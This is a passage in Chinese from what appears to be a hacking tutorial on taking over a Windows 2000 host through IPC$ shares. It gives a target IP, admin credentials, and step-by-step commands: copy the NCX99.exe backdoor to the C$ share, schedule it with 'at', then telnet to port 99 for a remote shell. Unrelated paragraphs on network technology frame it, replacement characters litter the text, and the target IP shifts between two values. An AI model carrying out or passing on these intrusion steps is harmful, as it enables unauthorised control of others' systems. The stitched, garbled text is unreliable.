網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體��,實現資源的全面共享和有機協作����,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機���、存儲資源、數據資源�、信息資源��、知識資源、專家資源���、大型數據庫、網絡�、傳感器等��。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
6.1.2 基于IPC$中級入侵
6.1.1節我們了解了基于IPC$共享入侵的簡單入侵����,本小節結合上一小節內容來深入來了解一下基于IPC$共享的中級入侵����。
1. 入侵測試目標:
測試主機:61.150.115.7(Windows2000)
用戶名:System32(隸屬Administrators組)
口令:ffhh.net
2. 入侵測試所用程序:
● Windows NT下的:command.com
● Windows 2000下的:命令提示符(即:cmd.exe)
● 后門程序:NCX99.exe (用于遠程登錄到目標服務器的99號端口)
3. 入侵測試:
所用系統為:Windows 2000 Professional
例如��,通過IPC$共享和遠程61.150.115.7建立了遠程連接(請參閱上一章節)���,所得到的是可以控制其硬盤讀寫操作,但是一個入侵者不會就此停手�����,還會進一步地控制目標機��,接下來看看入侵者是如何完全控制目標機的����。
(1) 在命令提示符下輸入如下命令格式:
copy d:\hacker\ncx99.exe \\61.150.115.9\c$
命令解釋:
將本地D盤hacker文夾下的NCX99.exe程序復制到61.150.115.9的C盤下�����。
輸入完畢后按Enter鍵�����,等待幾秒鐘后將會顯示文件已復制�,如圖6-14所示���。
圖6-14 在命令提示符下向目標機復制文件
注:
這里也可以通過將目標機61.150.115.9中的C盤映射到本地盤�����,然后直接復制過去�����,如圖6-15所示。
圖6-15 通過映射將ncx.exe程序復制到目標機
通過圖6-16可以看到NCX.exe成功地添加到目標機的C盤下。
(2) 在命令提示符下輸入如下命令格式:
net time \\61.150.115.9
圖6-16 NCX99.exe成功地被復制到目標機的C盤下
命令解釋:
查看目標機61.150.115.9上的時間�。
輸入完畢后按Enter鍵�����,將會顯示目標機現在的時間�����,如圖6-17所示����。
圖6-17 查看目標機上的時間
注:
屏幕上現在顯示的時間是下午03:27��,但是系統所采用的是24小時制�,那么現在目標機上的時間就是15:27���。
(3) 在命令提示符下輸入如下命令格式:
at \\61.150.115.9 15:29 c:\ncx99.exe
命令解釋:
讓61.150.115.9在15:29時執行ncx99.exe程序���,也就將ncx99.exe添加到目標機的計劃任務中���,讓它在15:29時自動運行��。
輸入完畢后按Enter鍵�,將出現新加了一項作業的字樣��,如圖6-18所示�����。
圖6-18 添加計劃任務
注意:
通過net time \\61.150.115.9得知目標服務器上的時間是15:27,但在添加計劃任務時將時間設為15:29�����,這是因為本地到遠程傳輸時需一定的時間��,為了確保NCX99.exe的運行,因此將計劃執行的時間向后推2分鐘。在這里也可以通過如下命令查看計劃是否被添加:
at \\61.150.115.9
命令解釋:
查看目標機計劃任務列表輸入完畢后,按Enter鍵即可看到如圖6-19所示,計劃被成功添加����。
圖6-19 查看目標機計劃任務列表
(4) 過2分鐘后�����,在命令提示符下輸入如下命令格式:
telnet 61.150.115.9 99
則如圖6-20所示的畫面。
圖6-20 通過99號端口遠程登錄到目標機
命令解釋:
目標服務器執行NCX99.exe后�����,就會在本機開啟一個99號端口�,用于遠程登錄。
命令輸入完畢后按下Enter鍵����,即可遠程登錄到目標機�,如圖6-21所示���。
圖6-21 遠程登錄到目標機
此時已完全控制了目標機。
(5) 入侵檢測成功完成�����!
網絡的神奇作用吸引著越來越多的用戶加入其中����,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上����、軟件上����、所用標準上......��,各項技術都需要適時應勢,對應發展���,這正是網絡迅速走向進步的催化劑。
